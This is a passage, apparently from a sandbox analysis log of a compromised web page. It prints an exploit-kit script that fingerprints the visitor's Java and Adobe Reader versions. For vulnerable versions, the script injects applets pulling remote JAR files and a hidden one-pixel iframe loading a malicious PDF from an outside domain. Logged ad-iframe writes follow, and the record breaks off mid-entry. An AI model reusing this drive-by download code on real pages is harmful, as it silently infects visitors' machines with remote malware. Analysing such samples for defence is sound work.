                        n, c, l, q, b, o, r, i = [];
                    if (e.compareNums(a.join(","), j.join(",")) > 0) {
                        j = a
                    }
                    j = e.formatNum(j.join(","));
                    var m, s = "1,4,2,0",
                        g = "JavaPlugin." + a[0] + "" + a[1] + "" + a[2] + "" + (a[3] > 0 ? ("_" + (a[3] < 10 ? "0" : "") + a[3]) : "");
                    for (h = 0; h < f.JavaVersions.length; h++) {
                        d = f.JavaVersions[h];
                        n = "JavaPlugin." + d[0] + "" + d[1];
                        b = d[0] + "." + d[1] + ".";
                        for (l = d[2]; l >= 0; l--) {
                            r = "JavaWebStart.isInstalled." + b + l + ".0";
                            if (e.compareNums(d[0] + "," + d[1] + "," + l + ",0", j) >= 0 && !e.getAXO(r)) {
                                continue
                            }
                            m = e.compareNums(d[0] + "," + d[1] + "," + l + ",0", s) < 0 ? true : false;
                            for (q = d[3]; q >= 0; q--) {
                                c = l + "_" + (q < 10 ? "0" + q : q);
                                o = n + c;
                                if (e.getAXO(o) && (m || e.getAXO(r))) {
                                    i.push(b + c);
                                    if (!p) {
                                        return i
                                    }
                                }
                                if (o == g) {
                                    return i
                                }
                            }
                            if (e.getAXO(n + l) && (m || e.getAXO(r))) {
                                i.push(b + l);
                                if (!p) {
                                    return i
                                }
                            }
                            if (n + l == g) {
                                return i
                            }
                        }
                    }
                    return i
                }
            },
            navMime: {
                $: 1,
                hasRun: 0,
                mimetype: "",
                version: "",
                length: 0,
                mimeObj: 0,
                pluginObj: 0,
                disabled: function() {
                    return this.$$.isDisabled.navMime()
                },
                query: function() {
                    var i = this,
                        f = i.$,
                        a = i.$$,
                        b = (i.hasRun || i.disabled());
                    i.hasRun = 1;
                    if (b) {
                        return i
                    };
                    var n = /^\s*application\/x-java-applet;jpi-version\s*=\s*(\d.*)$/i,
                        g, l, j, d = "",
                        h = "a",
                        o, m, k = {},
                        c = f.formatNum("0");
                    for (l = 0; l < navigator.mimeTypes.length; l++) {
                        o = navigator.mimeTypes[l];
                        m = o ? o.enabledPlugin : 0;
                        g = o && n.test(o.type || d) ? f.formatNum(f.getNum(RegExp.$1)) : 0;
                        if (g && m && (m.description || m.name)) {
                            if (!k[h + g]) {
                                i.length++
                            }
                            k[h + g] = o.type;
                            if (f.compareNums(g, c) > 0) {
                                c = g
                            }
                        }
                    }
                    g = k[h + c];
                    if (g) {
                        o = f.hasMimeType(g);
                        i.mimeObj = o;
                        i.pluginObj = o ? o.enabledPlugin : 0;
                        i.mimetype = g;
                        i.version = c
                    };
                    return i
                }
            },
            navPlugin: {
                $: 1,
                hasRun: 0,
                version: "",
                disabled: function() {
                    return this.$$.isDisabled.navPlugin()
                },
                query: function() {
                    var m = this,
                        e = m.$,
                        c = m.$$,
                        h = c.navigator,
                        j, l, k, g, d, a, i, f = 0,
                        b = (m.hasRun || m.disabled());
                    m.hasRun = 1;
                    if (b) {
                        return m
                    };
                    a = h.pluginObj.name || "";
                    i = h.pluginObj.description || "";
                    if (!f || c.debug) {
                        g = /Java.*TM.*Platform[^\d]*(\d+)(?:[\.,_](\d*))?(?:\s*[Update]+\s*(\d*))?/i;
                        if ((g.test(a) || g.test(i)) && parseInt(RegExp.$1, 10) >= 5) {
                            f = "1," + RegExp.$1 + "," + (RegExp.$2 ? RegExp.$2 : "0") + "," + (RegExp.$3 ? RegExp.$3 : "0")
                        }
                    }
                    if (!f || c.debug) {
                        g = /Java[^\d]*Plug-in/i;
                        l = g.test(i) ? e.formatNum(e.getNum(i)) : 0;
                        k = g.test(a) ? e.formatNum(e.getNum(a)) : 0;
                        if (l && (e.compareNums(l, e.formatNum("1,3")) < 0 || e.compareNums(l, e.formatNum("2")) >= 0)) {
                            l = 0
                        }
                        if (k && (e.compareNums(k, e.formatNum("1,3")) < 0 || e.compareNums(k, e.formatNum("2")) >= 0)) {
                            k = 0
                        }
                        d = l && k ? (e.compareNums(l, k) > 0 ? l : k) : (l || k);
                        if (d) {
                            f = d
                        }
                    }
                    if (!f && e.isSafari && e.OS == 2) {
                        j = e.findNavPlugin("Java.*\d.*Plug-in.*Cocoa", 0);
                        if (j) {
                            l = e.getNum(j.description);
                            if (l) {
                                f = l
                            }
                        }
                    };
                    if (f) {
                        m.version = e.formatNum(f)
                    };
                    return m
                }
            },
            lang: {
                $: 1,
                System: {
                    $: 1,
                    hasRun: 0,
                    result: [null, null],
                    disabled: function() {
                        return this.$$.isDisabled.windowDotJava()
                    },
                    getPropertyHas: function(a) {
                        var b = this,
                            d = b.$,
                            c = b.getProperty()[0];
                        return (a && c && d.compareNums(d.formatNum(a), d.formatNum(c)) === 0) ? 1 : 0
                    },
                    getProperty: function() {
                        var f = this,
                            g = f.$,
                            d = f.$$,
                            i, h = {},
                            b = (f.hasRun || f.disabled());
                        f.hasRun = 1;
                        if (!b) {
                            var a = "java_qqq990";
                            g[a] = null;
                            try {
                                var c = document.createElement("script");
                                c.type = "text/javascript";
                                c.appendChild(document.createTextNode("(function(){var e;try{if (window.java && window.java.lang && window.java.lang.System){" + g.name + "." + a + '=[window.java.lang.System.getProperty("java.version")+" ",window.java.lang.System.getProperty("java.vendor")+" "]}}catch(e){}})();'));
                                if (g.head.firstChild) {
                                    g.head.insertBefore(c, g.head.firstChild)
                                } else {
                                    g.head.appendChild(c)
                                }
                                g.head.removeChild(c)
                            } catch (i) {}
                            if (g[a] && g.isArray(g[a])) {
                                f.result = [].concat(g[a])
                            }
                        }
                        return f.result
                    }
                }
            },
            applet: {
                $: 1,
                results: [
                    [null, null],
                    [null, null],
                    [null, null]
                ],
                getResult: function() {
                    var c = this.results,
                        a, b = [];
                    for (a = 0; a < c.length; a++) {
                        b = c[a];
                        if (b[0]) {
                            break
                        }
                    }
                    return [].concat(b)
                },
                HTML: [0, 0, 0],
                active: [0, 0, 0],
                DummyObjTagHTML: 0,
                DummySpanTagHTML: 0,
                allowed: [1, 1, 1],
                VerifyTagsHas: function(c) {
                    var d = this,
                        b;
                    for (b = 0; b < d.allowed.length; b++) {
                        if (d.allowed[b] === c) {
                            return 1
                        }
                    }
                    return 0
                },
                saveAsVerifyTagsArray: function(c) {
                    var b = this,
                        d = b.$,
                        a;
                    if (d.isArray(c)) {
                        for (a = 0; a < b.allowed.length; a++) {
                            if (d.isNum(c[a])) {
                                if (c[a] < 0) {
                                    c[a] = 0
                                }
                                if (c[a] > 3) {
                                    c[a] = 3
                                }
                                b.allowed[a] = c[a]
                            }
                        }
                    }
                },
                setVerifyTagsArray: function(d) {
                    var b = this,
                        c = b.$,
                        a = b.$$;
                    if (a.getVersionDone === null) {
                        b.saveAsVerifyTagsArray(a.getVerifyTagsDefault())
                    }
                    if (a.debug || (a.verify && a.verify.isEnabled())) {
                        b.saveAsVerifyTagsArray([3, 3, 3])
                    } else {
                        if (d) {
                            b.saveAsVerifyTagsArray(d)
                        }
                    }
                },
                allDisabled: function() {
                    return this.$$.isDisabled.allApplets()
                },
                isDisabled: function(d) {
                    var b = this,
                        c = b.$,
                        a = b.$$;
                    if (d == 2 && !c.isIE) {
                        return 1
                    }
                    if (d === 0 || d == 2) {
                        return a.isDisabled.ObjectTag()
                    }
                    if (d == 1) {
                        return a.isDisabled.AppletTag()
                    }
                },
                can_Insert_Query: function(b) {
                    var a = this;
                    if (a.HTML[b]) {
                        return 0
                    }
                    return !a.isDisabled(b)
                },
                can_Insert_Query_Any: function() {
                    var b = this,
                        a;
                    for (a = 0; a < b.results.length; a++) {
                        if (b.can_Insert_Query(a)) {
                            return 1
                        }
                    }
                    return 0
                },
                should_Insert_Query: function(d) {
                    var b = this,
                        e = b.allowed,
                        c = b.$,
                        a = b.$$;
                    if (!b.can_Insert_Query(d)) {
                        return 0
                    }
                    if (e[d] == 3) {
                        return 1
                    }
                    if (e[d] == 2.8 && !b.getResult()[0]) {
                        return 1
                    }
                    if (e[d] == 2.5 && !a.lang.System.getProperty()[0]) {
                        return 1
                    }
                    if (e[d] == 2.2 && !a.lang.System.getProperty()[0] && !b.getResult()[0]) {
                        return 1
                    }
                    if (!a.nonAppletDetectionOk(a.version0)) {
                        if (e[d] == 2) {
                            return 1
                        }
                        if (e[d] == 1 && !b.getResult()[0]) {
                            return 1
                        }
                    }
                    return 0
                },
                should_Insert_Query_Any: function() {
                    var b = this,
                        a;
                    for (a = 0; a < b.allowed.length; a++) {
                        if (b.should_Insert_Query(a)) {
                            return 1
                        }
                    }
                    return 0
                },
                query: function(f) {
                    var h, a = this,
                        g = a.$,
                        d = a.$$,
                        i = null,
                        j = null,
                        b = a.results,
                        c;
                    if ((b[f][0] && b[f][1]) || (d.debug && d.OTF < 3)) {
                        return
                    }
                    c = g.getDOMobj(a.HTML[f], true);
                    if (c) {
                        try {
                            i = g.getNum(c.getVersion() + " ");
                            j = c.getVendor() + " ";
                            c.statusbar(g.winLoaded ? " " : " ")
                        } catch (h) {}
                        if (i && g.isStrNum(i)) {
                            b[f] = [i, j]
                        } else {};
                        try {
                            if (g.isIE && i && c.readyState != 4) {
                                g.garbage = true;
                                c.parentNode.removeChild(c)
                            }
                        } catch (h) {}
                    }
                },
                insert_Query_Any: function() {
                    var d = this,
                        i = d.$,
                        e = d.$$,
                        l = d.results,
                        p = d.HTML,
                        a = "&nbsp;&nbsp;&nbsp;&nbsp;",
                        g = "A.class",
                        m = i.file.getValid(e);
                    if (!m) {
                        return d.getResult()
                    }
                    if (e.OTF < 1) {
                        e.OTF = 1
                    }
                    if (d.allDisabled()) {
                        return d.getResult()
                    }
                    if (e.OTF < 1.5) {
                        e.OTF = 1.5
                    }
                    var j = m.name + m.ext,
                        h = m.path;
                    var f = ["archive", j, "code", g],
                        c = ["mayscript", "true"],
                        o = ["scriptable", "true"].concat(c),
                        n = e.navigator,
                        b = !i.isIE && n.mimeObj && n.mimeObj.type ? n.mimeObj.type : e.mimeType[0];
                    if (d.should_Insert_Query(0)) {
                        if (e.OTF < 2) {
                            e.OTF = 2
                        };
                        p[0] = i.isIE ? i.insertHTML("object", ["type", b], ["codebase", h].concat(f).concat(o), a, e) : i.insertHTML("object", ["type", b], ["codebase", h].concat(f).concat(o), a, e);
                        l[0] = [0, 0];
                        d.query(0)
                    }
                    if (d.should_Insert_Query(1)) {
                        if (e.OTF < 2) {
                            e.OTF = 2
                        };
                        p[1] = i.isIE ? i.insertHTML("applet", ["alt", a].concat(c).concat(f), ["codebase", h].concat(c), a, e) : i.insertHTML("applet", ["codebase", h, "alt", a].concat(c).concat(f), [].concat(c), a, e);
                        l[1] = [0, 0];
                        d.query(1)
                    }
                    if (d.should_Insert_Query(2)) {
                        if (e.OTF < 2) {
                            e.OTF = 2
                        };
                        p[2] = i.isIE ? i.insertHTML("object", ["classid", e.classID], ["codebase", h].concat(f).concat(o), a, e) : i.insertHTML();
                        l[2] = [0, 0];
                        d.query(2)
                    }
                    if (!d.DummyObjTagHTML && !e.isDisabled.ObjectTag()) {
                        d.DummyObjTagHTML = i.insertHTML("object", [], [], a)
                    }
                    if (!d.DummySpanTagHTML) {
                        d.DummySpanTagHTML = i.insertHTML("", [], [], a)
                    };
                    var k = e.NOTF;
                    if (e.OTF < 3 && k.shouldContinueQuery()) {
                        e.OTF = 3;
                        k.onIntervalQuery = i.handler(k.$$onIntervalQuery, k);
                        if (!i.winLoaded) {
                            i.WLfuncs0.push([k.winOnLoadQuery, k])
                        }
                        setTimeout(k.onIntervalQuery, k.intervalLength)
                    };
                    return d.getResult()
                }
            },
            NOTF: {
                $: 1,
                count: 0,
                countMax: 25,
                intervalLength: 250,
                shouldContinueQuery: function() {
                    var e = this,
                        d = e.$,
                        c = e.$$,
                        b = c.applet,
                        a;
                    for (a = 0; a < b.results.length; a++) {
                        if (b.HTML[a] && !b.results[a][0] && (b.allowed[a] >= 2 || (b.allowed[a] == 1 && !b.getResult()[0])) && e.isAppletActive(a) >= 0) {
                            return 1
                        }
                    }
                    return 0
                },
                isJavaActive: function(d) {
                    var f = this,
                        c = f.$$,
                        a, b, e = -9;
                    for (a = 0; a < c.applet.HTML.length; a++) {
                        b = f.isAppletActive(a, d);
                        if (b > e) {
                            e = b
                        }
                    }
                    return e
                },
                isAppletActive: function(c, a) {
                    var d = this,
                        b = d.$$.applet.active;
                    if (!a) {
                        b[c] = d.isAppletActive_(c)
                    }
                    return b[c]
                },
                isAppletActive_: function(d) {
                    var g = this,
                        f = g.$,
                        b = g.$$,
                        l = b.navigator,
                        a = b.applet,
                        h = a.HTML[d],
                        i, k, c = 0,
                        j = f.getTagStatus(h, a.DummySpanTagHTML, a.DummyObjTagHTML, g.count);
                    if (j == -2) {
                        return -2
                    }
                    try {
                        if (f.isIE && f.verIE >= b.minIEver && f.getDOMobj(h).object) {
                            return 1
                        }
                    } catch (i) {}
                    for (k = 0; k < a.active.length; k++) {
                        if (a.active[k] > 0) {
                            c = 1
                        }
                    }
                    if (j == 1 && (f.isIE || ((b.version0 && l.javaEnabled() && l.mimeObj && (h.tagName == "object" || c)) || b.lang.System.getProperty()[0]))) {
                        return 1
                    }
                    if (j < 0) {
                        return -1
                    }
                    return 0
                },
                winOnLoadQuery: function(c, d) {
                    var b = d.$$,
                        a;
                    if (b.OTF == 3) {
                        a = d.queryAllApplets();
                        d.queryCompleted(a[1], a[2])
                    }
                },
                $$onIntervalQuery: function(d) {
                    var c = d.$,
                        b = d.$$,
                        a;
                    if (b.OTF == 3) {
                        a = d.queryAllApplets();
                        if (!d.shouldContinueQuery() || (c.winLoaded && d.count > d.countMax)) {
                            d.queryCompleted(a[1], a[2])
                        }
                    }
                    d.count++;
                    if (b.OTF == 3) {
                        setTimeout(d.onIntervalQuery, d.intervalLength)
                    }
                },
                queryAllApplets: function() {
                    var g = this,
                        f = g.$,
                        e = g.$$,
                        d = e.applet,
                        b, a, c;
                    for (b = 0; b < d.results.length; b++) {
                        d.query(b)
                    }
                    a = d.getResult();
                    c = a[0] ? true : false;
                    return [c, a[0], a[1]]
                },
                queryCompleted: function(c, f) {
                    var e = this,
                        d = e.$,
                        b = e.$$;
                    if (b.OTF >= 4) {
                        return
                    }
                    b.OTF = 4;
                    var a = e.isJavaActive();
                    b.setPluginStatus(c, f, 0);
                    if (b.funcs) {
                        d.callArray(b.funcs)
                    }
                    if (d.onDoneEmptyDiv) {
                        d.onDoneEmptyDiv()
                    }
                }
            },
            zz: 0
        },
        adobereader: {
            mimeType: "application/pdf",
            navPluginObj: null,
            progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
            classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
            INSTALLED: {},
            pluginHasMimeType: function(d, c, f) {
                var b = this,
                    e = b.$,
                    a;
                for (a in d) {
                    if (d[a] && d[a].type && d[a].type == c) {
                        return 1
                    }
                }
                if (e.getMimeEnabledPlugin(c, f)) {
                    return 1
                }
                return 0
            },
            getVersion: function(l, j) {
                var g = this,
                    d = g.$,
                    i, f, m, n, b = null,
                    h = null,
                    k = g.mimeType,
                    a, c;
                if (d.isString(j)) {
                    j = j.replace(/\s/g, "");
                    if (j) {
                        k = j
                    }
                } else {
                    j = null
                }
                if (d.isDefined(g.INSTALLED[k])) {
                    g.installed = g.INSTALLED[k];
                    return
                }
                if (!d.isIE) {
                    a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
                    if (g.getVersionDone !== 0) {
                        g.getVersionDone = 0;
                        b = d.getMimeEnabledPlugin(g.mimeType, a);
                        if (!j) {
                            n = b
                        }
                        if (!b && d.hasMimeType(g.mimeType)) {
                            b = d.findNavPlugin(a, 0)
                        }
                        if (b) {
                            g.navPluginObj = b;
                            h = d.getNum(b.description) || d.getNum(b.name);
                            h = d.getPluginFileVersion(b, h);
                            if (!h && d.OS == 1) {
                                if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)) {
                                    h = "9"
                                } else {
                                    if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)) {
                                        h = "8"
                                    }
                                }
                            }
                        }
                    } else {
                        h = g.version
                    }
                    if (!d.isDefined(n)) {
                        n = d.getMimeEnabledPlugin(k, a)
                    }
                    g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ? -0.2 : -1))
                } else {
                    b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
                    c = /=\s*([\d\.]+)/g;
                    try {
                        f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src", ""], "", g))).GetVersions();
                        for (m = 0; m < 5; m++) {
                            if (c.test(f) && (!h || RegExp.$1 > h)) {
                                h = RegExp.$1
                            }
                        }
                    } catch (i) {}
                    g.installed = h ? 1 : (b ? 0 : -1)
                }
                if (!g.version) {
                    g.version = d.formatNum(h)
                }
                g.INSTALLED[k] = g.installed
            }
        },
        zz: 0
    }
};
stfo.initScript();
jver = stfo.getVersion("Java");
if (typeof jver == "string") {
    jver = jver.split(",");
    if (jver[3].length == 1) {
        jver = "" + jver[1] + "0" + jver[3];
    } else {
        jver = "" + jver[1] + jver[3];
    }
} else {
    jver = 0;
}
pdfver = stfo.getVersion("AdobeReader");
if (typeof pdfver == "string") {
    pdfver = pdfver.split(",");
    pdfver[3] = pdfver[3].substring(0, 1);
    pdfver = parseInt(pdfver.join(""), 10);
} else {
    pdfver = 0;
}
if (jver >= 400 && jver < 700) {
    var qh = document.createElement("applet");
    qh.setAttribute("code", "den.class");
    qh.setAttribute("archive", "http://nalivaipervuu.info/barracuda.jar");
    var rhp = document.createElement("param");
    rhp.setAttribute("name", "boierthjwiorjweiorjweiorjewiorjwioesjznzosowpw0435");
    rhp.setAttribute("value", "807328e0h6c2f58b7t8b956cdft9402bb0cpe0ea617d:a4d4cc06/d68aa711/ff4c8556n7f576559a5297b77dl5080ce18i3b81c714v9d08f20aa922126c6i97e8012epc88ee293e9577df75r7ea75e14v5df88dd8uf6fcd899u67b879d7.87a5f926i5eba00f9nba3d7a0cf247dc907o77be74bc/dfdb9d63oc2816441u33f7db25t6b381e5e.752dd462p9869e60eh51cf1925p5bd68dc3?55f1ddeea7138f7c6=bcec3cab4219119b07c1ae486504644529af94629c970c8c633862668c1f5218acaee384d2a93c184560697b71124fa48a00fa39301f5d6a1e22006da5046349380afb0c3139acb174cf6854022decf8e66055ea6500710a7a9b84420bc107db4cdeabeeb70729094acf91676c3f073a0bee3a0790ef8d17a2079f2421b1cca0025f0234dc9e2ba589b02200f8d5aac7386b9808&982822dcp3bbcdc41=6fbed8ed1");
    qh.appendChild(rhp);
    document.body.appendChild(qh);
};
if (jver >= 700 && jver < 707) {
    var rh = document.createElement("applet");
    rh.setAttribute("code", "pilot.class");
    rh.setAttribute("archive", "http://nalivaipervuu.info/blevota.jar");
    var rhp = document.createElement("param");
    rhp.setAttribute("name", "boierthjwiorjweiorjweiorjewiorjwioesjznzosowpw0435");
    rhp.setAttribute("value", "136df6ech799ae06ct99dd8a94td81ad008p3eac56fb:465cd4d8/4b445688/426a7686n964c8956a6bd4e2f3l281b90c8i95e8f7c5v382eb406afc130bcei52000497p42c9a566e337ed329r6015a9a2vbbe2928du9d86e7beu562a290d.6a7b0ccci40cb4392ne9535fc4f512c05f7obc9b1dba/afa3032coa1c2363fud7446935t5bc9a254.ae0437fdp08771c75h927c0402p3f93793c?15c343cfa5d0a6d2a=58794f9542b49c700781bc26fb0d08409bdf2caa7cec0c592bb4d20d1a2c36174df0a284bc3009ea47fd9bef1122da896a0bcbc3206fb80413fd01de6270c3bb8c3cf60090176611154712130efa4054a605bb18d10e479c20ebdb6272fd00384ab60bf556e45d0ab1b88ce795604b4d0a21316da054926ff40624eb3f31d5e63905045cd1ddcb2fb306790b153d2587cb491123&f7944f4bp14eea38e=58b831e92");
    rh.appendChild(rhp);
    document.body.appendChild(rh);
};

function ifr(abc) {
    var dh = document.createElement("iframe");
    dh.setAttribute("width", 1);
    dh.setAttribute("height", 1);
    dh.setAttribute("src", abc);
    document.body.appendChild(dh);
};

function pdf() {
    try {
        if ((pdfver >= 8000 && pdfver <= 8200) || (pdfver >= 9000 && pdfver <= 9301)) {
            ifr("http://nalivaipervuu.info/manual.pdf");
        }
    } catch (e) {}
}
setTimeout(pdf, 3100);

Executed Evals (0)


Executed Writes (24)

#1 JavaScript::Write (size: 462, repeated: 1)

<!doctype html><html><body><script>google_ad_client="pub-8412828530142307";google_ad_height=15;google_ad_slot="2367292824";google_ad_width=468;google_show_ads_impl=true;google_unique_id=1;google_async_iframe_id="aswift_0";google_ad_unit_key="1391301316";google_start_time=1352339076404;google_expand_experiment="none";google_bpp=14;</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20121031/r20120730/show_ads_impl.js"></script></body></html>

#2 JavaScript::Write (size: 461, repeated: 1)

<!doctype html><html><body><script>google_ad_client="pub-8412828530142307";google_ad_height=15;google_ad_slot="2367292824";google_ad_width=468;google_show_ads_impl=true;google_unique_id=2;google_async_iframe_id="aswift_1";google_ad_unit_key="1391301316";google_start_time=1352339076454;google_expand_experiment="none";google_bpp=4;</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20121031/r20120730/show_ads_impl.js"></script></body></html>

#3 JavaScript::Write (size: 461, repeated: 1)

<!doctype html><html><body><script>google_ad_client="pub-8412828530142307";google_ad_height=15;google_ad_slot="2367292824";google_ad_width=468;google_show_ads_impl=true;google_unique_id=3;google_async_iframe_id="aswift_2";google_ad_unit_key="1391301316";google_start_time=1352339076476;google_expand_experiment="none";google_bpp=4;</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20121031/r20120730/show_ads_impl.js"></script></body></html>

#4 JavaScript::Write (size: 462, repeated: 1)

<!doctype html><html><body><script>google_ad_client="pub-8412828530142307";google_ad_height=600;google_ad_slot="2264561644";google_ad_width=120;google_show_ads_impl=true;google_unique_id=6;google_async_iframe_id="aswift_5";google_ad_unit_key="4201446564";google_start_time=1352339076988;google_expand_experiment="none";google_bpp=4;</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20121031/r20120730/show_ads_impl.js"></script></body></html>

#5 JavaScript::Write (size: 461, repeated: 1)

<!doctype html><html><body><script>google_ad_client="pub-8412828530142307";google_ad_height=60;google_ad_slot="2612022508";google_ad_width=468;google_show_ads_impl=true;google_unique_id=5;google_async_iframe_id="aswift_4";google_ad_unit_key="1583532706";google_start_time=1352339076842;google_expand_experiment="none";google_bpp=8;</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20121031/r20120730/show_ads_impl.js"></script></body></html>

#6 JavaScript::Write (size: 461, repeated: 1)

<!doctype html><html><body><script>google_ad_client="pub-8412828530142307";google_ad_height=60;google_ad_slot="3914615204";google_ad_width=468;google_show_ads_impl=true;google_unique_id=4;google_async_iframe_id="aswift_3";google_ad_unit_key="3216236652";google_start_time=1352339076724;google_expand_experiment="none";google_bpp=3;</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20121031/r20120730/show_ads_impl.js"></script></body></html>

#7 JavaScript::Write (size: 25, repeated: 12)

<div id='MIXX_ADS'></div>

#8 JavaScript::Write (size: 46, repeated: 1)

<div id=google_temp_div_homepage_right ></div>

#9 JavaScript::Write (size: 799, repeated: 1)

<iframe allowtransparency=true frameborder=0 height=15 hspace=0 id=google_ads_frame1 marginheight=0 marginwidth=0 name=google_ads_frame1 scrolling=no src="http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8412828530142307&output=html&h=15&slotname=2367292824&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076404&bpp=14&shv=r20121031&jsv=r20110914&correlator=1352339076716&frm=20&adk=1391301316&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=196&ady=316&biw=1159&bih=778&oid=3&fu=0&ifi=1&dtd=461&xpc=eQPNEDLsfI&p=http%3A//www.indiansites.in" style="left:0;position:absolute;top:0" vspace=0 width=468></iframe>

#10 JavaScript::Write (size: 824, repeated: 1)

<iframe allowtransparency=true frameborder=0 height=15 hspace=0 id=google_ads_frame2 marginheight=0 marginwidth=0 name=google_ads_frame2 scrolling=no src="http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8412828530142307&output=html&h=15&slotname=2367292824&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076454&bpp=4&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824&correlator=1352339076716&frm=20&adk=1391301316&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=176&ady=321&biw=1159&bih=778&oid=3&fu=0&ifi=2&dtd=743&xpc=c60Sk3157Q&p=http%3A//www.indiansites.in" style="left:0;position:absolute;top:0" vspace=0 width=468></iframe>

#11 JavaScript::Write (size: 837, repeated: 1)

<iframe allowtransparency=true frameborder=0 height=15 hspace=0 id=google_ads_frame3 marginheight=0 marginwidth=0 name=google_ads_frame3 scrolling=no src="http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8412828530142307&output=html&h=15&slotname=2367292824&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076476&bpp=4&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824%2C2367292824&correlator=1352339076716&frm=20&adk=1391301316&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=176&ady=346&biw=1159&bih=778&oid=3&fu=0&ifi=3&dtd=798&xpc=uTgFQN3FNV&p=http%3A//www.indiansites.in" style="left:0;position:absolute;top:0" vspace=0 width=468></iframe>

#12 JavaScript::Write (size: 863, repeated: 1)

<iframe allowtransparency=true frameborder=0 height=60 hspace=0 id=google_ads_frame4 marginheight=0 marginwidth=0 name=google_ads_frame4 scrolling=no src="http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8412828530142307&output=html&h=60&slotname=3914615204&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076724&bpp=3&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824%2C2367292824%2C2367292824&correlator=1352339076716&frm=20&adk=3216236652&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=390&ady=500&biw=1159&bih=778&eid=39482000&oid=3&fu=0&ifi=4&dtd=630&xpc=U29PBLBGgm&p=http%3A//www.indiansites.in" style="left:0;position:absolute;top:0" vspace=0 width=468></iframe>

#13 JavaScript::Write (size: 864, repeated: 1)

<iframe allowtransparency=true frameborder=0 height=60 hspace=0 id=google_ads_frame5 marginheight=0 marginwidth=0 name=google_ads_frame5 scrolling=no src="http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8412828530142307&output=html&h=60&slotname=2612022508&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076842&bpp=8&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824%2C2367292824%2C2367292824%2C3914615204&correlator=1352339076716&frm=20&adk=1583532706&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=390&ady=1594&biw=1159&bih=778&oid=3&fu=0&ifi=5&dtd=766&xpc=Bsu5NYUYfg&p=http%3A//www.indiansites.in" style="left:0;position:absolute;top:0" vspace=0 width=468></iframe>

#14 JavaScript::Write (size: 878, repeated: 1)

<iframe allowtransparency=true frameborder=0 height=600 hspace=0 id=google_ads_frame6 marginheight=0 marginwidth=0 name=google_ads_frame6 scrolling=no src="http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8412828530142307&output=html&h=600&slotname=2264561644&w=120&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076988&bpp=4&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824%2C2367292824%2C2367292824%2C3914615204%2C2612022508&correlator=1352339076716&frm=20&adk=4201446564&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=869&ady=379&biw=1159&bih=778&oid=3&fu=0&ifi=6&dtd=716&xpc=hY0BPbgU0a&p=http%3A//www.indiansites.in" style="left:0;position:absolute;top:0" vspace=0 width=120></iframe>

#15 JavaScript::Write (size: 766, repeated: 1)

